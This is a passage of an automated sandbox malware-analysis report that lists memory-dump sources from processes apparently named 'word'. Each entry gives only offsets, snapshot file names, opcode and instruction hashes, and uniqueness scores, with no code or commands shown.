                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6dad8a375b2834c6ebe6ab40bb1e69f13bdeccbe147e6e64d29eef4c7d44c9d
                        • Instruction ID: 1c05d8b8d8d6bac7355c30c23331c96e64313e983d126312016aeb13e467d583
                        • Opcode Fuzzy Hash: b6dad8a375b2834c6ebe6ab40bb1e69f13bdeccbe147e6e64d29eef4c7d44c9d
                        • Instruction Fuzzy Hash: AAC08CC5D8D3D05EC70B3B609C292857FB08C030403CA50C34445C90AFE40D0A0E47D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3330a26405ee38e155c121b65037bfe48d56cf03da67f3eebeb645495b72ac09
                        • Instruction ID: 66551ab73520acd7a4e9f79881a5f1751e7d95c70cec7eca84c34bd727a3ae71
                        • Opcode Fuzzy Hash: 3330a26405ee38e155c121b65037bfe48d56cf03da67f3eebeb645495b72ac09
                        • Instruction Fuzzy Hash: BAC0026510E2818FC71287B488A9404BF715F5611432A94CBE444CB2A7CF1ADE4BD752
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 76630fbe74cd4263637bbc193f84f1c25abb35bddc76cad71383d0a878f713c8
                        • Instruction ID: 982eb64ab226481fb64d1fe399ac404256bd38cb4adfd9bcec919c1a67c03f71
                        • Opcode Fuzzy Hash: 76630fbe74cd4263637bbc193f84f1c25abb35bddc76cad71383d0a878f713c8
                        • Instruction Fuzzy Hash: E9C0923740580C9F8A02FB90E50245CB3A9EF9221071006EAA81A4F27ADF221A349B82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02ac563a14169b87d8b92b6916aee83de9a10334b277bde5b4c96001b91f3bb8
                        • Instruction ID: 9e48429772ebd30a845f4e8706fb32ed884d20dd7beb272c93b2cc3b4bdd84bb
                        • Opcode Fuzzy Hash: 02ac563a14169b87d8b92b6916aee83de9a10334b277bde5b4c96001b91f3bb8
                        • Instruction Fuzzy Hash: 0EC08C8000C6C15FC303433448B04B0BFB0AC4320030E00CDC4D44B1B3DB15A873E781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                        • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                        • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                        • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: adaa8ccd9f26c9b9545fee82f06ce1eaa3a126809e99a5a132ea8a9fd6040ab1
                        • Instruction ID: 7092b6f2825aaa0436c5aaaef760af7db5111808a2342ac846c1390ad93c7219
                        • Opcode Fuzzy Hash: adaa8ccd9f26c9b9545fee82f06ce1eaa3a126809e99a5a132ea8a9fd6040ab1
                        • Instruction Fuzzy Hash: A2316B71A002059FCB51EFA4E885AAF7BB6FB88301B10813AE606D7294EE358C459BD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 099f6c26e538e75f90a0e628234e10e51c69f33cda8b4f99ba3ae30d31a92202
                        • Instruction ID: ffcf0a8e890c3531dcd3826b0c4f808b93d7d8de87c3f584513ecc323308a73a
                        • Opcode Fuzzy Hash: 099f6c26e538e75f90a0e628234e10e51c69f33cda8b4f99ba3ae30d31a92202
                        • Instruction Fuzzy Hash: 6F215534908209CFCB14DFA5C4806EEBBF5FB8A304F208465E809BB261DB309A54CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b044e503ae8093db48b9161dc24916547b02e3fe8a4712424d8aa47adb679acf
                        • Instruction ID: c07c8c49601feab701408ca18fa4ab2752b024e3e021b0c8cb0aed7568e2629f
                        • Opcode Fuzzy Hash: b044e503ae8093db48b9161dc24916547b02e3fe8a4712424d8aa47adb679acf
                        • Instruction Fuzzy Hash: 2821ED307085048FCB25DBA5C5803AD77F6EF85300F2441AAE206EB290EF3ACD528B52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a413e77a2b24fb6f44c68c0b534ca5186c9a26327e2b978bd36f1755a634e808
                        • Instruction ID: ffa5e96e65c000668c7fe3b2b925f53845c21faf7947c18987fa2bf051b9bf58
                        • Opcode Fuzzy Hash: a413e77a2b24fb6f44c68c0b534ca5186c9a26327e2b978bd36f1755a634e808
                        • Instruction Fuzzy Hash: AF215974D0420AEFEB60DFA6D580BADB7B1FB44340F6099A9C416EB290DB745E80DF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17c41449e7c5bb3f0d60b044aaa719d929244d62070a2ac1a7aef35dd458b49f
                        • Instruction ID: a41ad15a9bcd0c7c78c64758da33cc94f06701aabc4641bd224c66ae4ce54a73
                        • Opcode Fuzzy Hash: 17c41449e7c5bb3f0d60b044aaa719d929244d62070a2ac1a7aef35dd458b49f
                        • Instruction Fuzzy Hash: 6A215774D08109CFCB14DFA5C5806EEBBF9FB89304F208469E909BB260DB319A54CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0103ac487450d9c733a9083fe28fd8553eebe722d17bbe0a6bb23b8d744f7096
                        • Instruction ID: 005eb38c77b536df42b85c612f099288e7bea2353c2d2f601024e7b00f6a756e
                        • Opcode Fuzzy Hash: 0103ac487450d9c733a9083fe28fd8553eebe722d17bbe0a6bb23b8d744f7096
                        • Instruction Fuzzy Hash: D021FD786041848FD316DF64D519BEA7BB2AF89310F2881F9D00AEBB91CB795C41CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42772654a44545bed43739cd62f989de5c9209d86dd54580474e06597afa2bf7
                        • Instruction ID: 0638a0b24482efad6283e8b27fed918605664b9e0173b0f8bc3e8dfd35c0f063
                        • Opcode Fuzzy Hash: 42772654a44545bed43739cd62f989de5c9209d86dd54580474e06597afa2bf7
                        • Instruction Fuzzy Hash: 8721E138D49A84AFC706DFA4D1406DCBFB1EF47304F24A5DAC015DB3A2D6381986DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b8f4185d521f32cb195be0678e30806198f0e012e4dcebe95ad5ca08226e05b
                        • Instruction ID: d40e268c2a49ced1b03b2f59862868769a331faee106a9f8b703651d8c3483e4
                        • Opcode Fuzzy Hash: 4b8f4185d521f32cb195be0678e30806198f0e012e4dcebe95ad5ca08226e05b
                        • Instruction Fuzzy Hash: 5D01A539305108ABDB115E96EC84EEB7B5EFB85325F10803DFA0AC7351CA718C10D751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c9d1dcd677d372ff41ed8027649284dc858523edc04b4645b6d0be05b653d149
                        • Instruction ID: ab59c29777df1bc67b2da3ba797073c3aee6822f0af4d589ad9c1513855c10ca
                        • Opcode Fuzzy Hash: c9d1dcd677d372ff41ed8027649284dc858523edc04b4645b6d0be05b653d149
                        • Instruction Fuzzy Hash: EE211A38A00118CFEB25DF64C955B9EB7B2FF84305F1080A9D90AA7389DB34AE41DF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37886137e1687cd671482186241d44ccc0931a822fa421853281de158d2b7e1d
                        • Instruction ID: 778557f1c7775c7851e52199e9c46b45e853137f88fb3c500e681907242efd64
                        • Opcode Fuzzy Hash: 37886137e1687cd671482186241d44ccc0931a822fa421853281de158d2b7e1d
                        • Instruction Fuzzy Hash: BE119E78A001188FD714DB54C509BEE37F2AB88314F2041B9D00AA7B90CB756C41CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c03044aecb0f4c13b477c3dffe96ab7a403ed6c71d9035e51ebaeddca529e404
                        • Instruction ID: a811bc5c3197ab5aa1eb9fdbc81f9999c0275f4fd7125c566c8c95592ec5acaf
                        • Opcode Fuzzy Hash: c03044aecb0f4c13b477c3dffe96ab7a403ed6c71d9035e51ebaeddca529e404
                        • Instruction Fuzzy Hash: F301B16A20D2C96FC7039BB4A8209EA7F79DF87210F0588EAE585CB253C9215915E7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac983d808286beb3cc9610bb0ff9b453943ea1f3997e660ddea85e2d216d6f0c
                        • Instruction ID: 974e49a264f2995fc4aac00a0b272a12b2308f597822e19a620250b2378ee633
                        • Opcode Fuzzy Hash: ac983d808286beb3cc9610bb0ff9b453943ea1f3997e660ddea85e2d216d6f0c
                        • Instruction Fuzzy Hash: 0E11483CE08288EFC715DB64D962AD87BB1EF45208F10C1AED415EB393DA305D82DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 28bb44564ea7a632b46b7c0d9f811e6311aa38c4099cd98d371a7962d40cc16c
                        • Instruction ID: 666c5c6b344e2aeefea3ea04eae9608750fc0ea79511f9c6f81e7b93b91621a8
                        • Opcode Fuzzy Hash: 28bb44564ea7a632b46b7c0d9f811e6311aa38c4099cd98d371a7962d40cc16c
                        • Instruction Fuzzy Hash: C3118CB8A04154CFE711CBA4C959BA937B2AF49304F1481E9D006EBBA1CB789D41CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b028928c81f82b5940508d141fd9852d42d24862d75024dbe1f7312888aeb924
                        • Instruction ID: a914c1108589f43a74dc606e20f3182ec923d32b257d324191721679e724d4c5
                        • Opcode Fuzzy Hash: b028928c81f82b5940508d141fd9852d42d24862d75024dbe1f7312888aeb924
                        • Instruction Fuzzy Hash: 8F118274A08204CBDB48DF5AE4847AA7BA6FBC9305F148174E01AAB398CB70D952DB45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6c7d589be738fbfb82e3bdf912a5616ec88e15c9088f13f57359cb355d94c85
                        • Instruction ID: 9f8cc9487edb2ae9a307d2a8a7bfdb31d8bdd04eefbd563ea4414c6a7eadd8c8
                        • Opcode Fuzzy Hash: e6c7d589be738fbfb82e3bdf912a5616ec88e15c9088f13f57359cb355d94c85
                        • Instruction Fuzzy Hash: 05113974D0C204DFCB14EFA9D5906ADBBB5FF4A300F2095AAD819A7322E7304A45CF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a2ff5c066933d4ee7c26d13546c4031da63dfba704f39758fed13a9e4b667139
                        • Instruction ID: 6f537af4f5048ddcb70489cd9c5f71daff28f064342a18c6a57d02b718717f8c
                        • Opcode Fuzzy Hash: a2ff5c066933d4ee7c26d13546c4031da63dfba704f39758fed13a9e4b667139
                        • Instruction Fuzzy Hash: 6C01757070C1048BD758CB5AD4806AB66AAE7CD311F64D068D40EDF789CB30C8169684
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f46162e388570557c3e656a599f94edd0d5d18fa6b8250802b37746a1ad3457
                        • Instruction ID: c8cae4c03386e82bde0389609fa24587b4a3ac9d64100a363b5ee6e87d4fd746
                        • Opcode Fuzzy Hash: 2f46162e388570557c3e656a599f94edd0d5d18fa6b8250802b37746a1ad3457
                        • Instruction Fuzzy Hash: D30116B4D19209DFCB55DFA9D8442AEBFB4FF4A300F2191AAD81AE7261E7304A41CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 370ebc9146ec767c00277f67704e413f64ffaf1661e8f30fc30b59884b1cf6a5
                        • Instruction ID: dd3e4de894838e5d4745b8fbcba8ef2b3f80b56a674509b29012b9616b6650b4
                        • Opcode Fuzzy Hash: 370ebc9146ec767c00277f67704e413f64ffaf1661e8f30fc30b59884b1cf6a5
                        • Instruction Fuzzy Hash: 1311523890110ADFDB19CF90D648BEDB7B2FF48304F148259E405AB354C7B56D85CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2231c11eeef130bef29543e91d083d9e7f7dd6a5fcada70c7ff4e34bf74df25a
                        • Instruction ID: 2ec72315ffaba3b6b9f6ec4c29978d2247c8a8441fce4a512a96195486f780b7
                        • Opcode Fuzzy Hash: 2231c11eeef130bef29543e91d083d9e7f7dd6a5fcada70c7ff4e34bf74df25a
                        • Instruction Fuzzy Hash: 5B01F778E08908EFCB45DFA5D141ADCB7B1FF85304F2095A9D406D3351E6755A94CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae88b940e20ca8fd06ab40151d4e8d6ee8e56ee83894906e4c061725f62a5774
                        • Instruction ID: 444e59884a132968ff13f0c4c5cf2cf62575aadc6558d25ab231096a7284dea3
                        • Opcode Fuzzy Hash: ae88b940e20ca8fd06ab40151d4e8d6ee8e56ee83894906e4c061725f62a5774
                        • Instruction Fuzzy Hash: CB01B570A08208CFDB44DF95E4843EE7BE6FB89305F2481A9D019AB399C775C406CB45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a60a40a07ac56dc077d4bf1dd61e485f36b2470ebe86bda44a387fb134ca256
                        • Instruction ID: 0def12da6c9b98db20e5cf33f333831cbb9e010ced48961894ee2af0e4fc00d9
                        • Opcode Fuzzy Hash: 6a60a40a07ac56dc077d4bf1dd61e485f36b2470ebe86bda44a387fb134ca256
                        • Instruction Fuzzy Hash: 5E014C74D04208EFCB24DFA6D5C5AACBBF1FB88300F20C5AAD41997250D7765E80DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f091d482717f2d160c3c492ac4ad5389ab8dace7bd158317fd399c28c2c7115
                        • Instruction ID: 560240594d949eba02cf1eb38b58fb416554711b23ef7a1120d9caeeb0e4012a
                        • Opcode Fuzzy Hash: 3f091d482717f2d160c3c492ac4ad5389ab8dace7bd158317fd399c28c2c7115
                        • Instruction Fuzzy Hash: 10F0F639305208ABD7021F55EC808EABF29FF8A355714407AFA09CB351CA614D15D3A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aebfaab80f094bba141d458752a2b999cc4b402a80a3a2852e53e10b91a7cdb5
                        • Instruction ID: d606a41fab2b50ee0021fca2899a34ca3328b8dfde8efd6c50f83974524ae1f9
                        • Opcode Fuzzy Hash: aebfaab80f094bba141d458752a2b999cc4b402a80a3a2852e53e10b91a7cdb5
                        • Instruction Fuzzy Hash: E301813250D2859FC313CF64C8614A9BFB19F4720471894E6D289CF262C6329D52E761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38aaa29e0f03565f17dd32b7b9549011eb47214d8d6f3185903ead172bd570c4
                        • Instruction ID: 49907514a862fd4fc455aeffa553282ee4ed822c4bdfec934e985f32d9972652
                        • Opcode Fuzzy Hash: 38aaa29e0f03565f17dd32b7b9549011eb47214d8d6f3185903ead172bd570c4
                        • Instruction Fuzzy Hash: BCF0C23950824CBFC702EFA4C8018AABF7DDF46214B1484DBE9458B312CA329D11E7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1276e01f2b1fc50c4a8c73cab02f7230a0936332404baf00abc1979850f345f6
                        • Instruction ID: 01b6c922d2b685cacb1b17c82099f9818e82ef52f3ff459b6341d9de530ffc00
                        • Opcode Fuzzy Hash: 1276e01f2b1fc50c4a8c73cab02f7230a0936332404baf00abc1979850f345f6
                        • Instruction Fuzzy Hash: 1B01D67460C2449BCB08DBA5E4907EE7BA6EF89305F208528E405AF3A9DF304A85CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad99cf259a82e5736c54930b9e32c96d8d6c0dd30c255a7887354f0c8a66fcd9
                        • Instruction ID: 3fba2d6c0ebfabc8d6d09ff9ec8faad9788c9748f632bd7d18073c0d5c4474b4
                        • Opcode Fuzzy Hash: ad99cf259a82e5736c54930b9e32c96d8d6c0dd30c255a7887354f0c8a66fcd9
                        • Instruction Fuzzy Hash: CD017C3CE04108EBC744DF64DA52AE8B7B2FF84208F10C16DD405E7352DA305E81DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
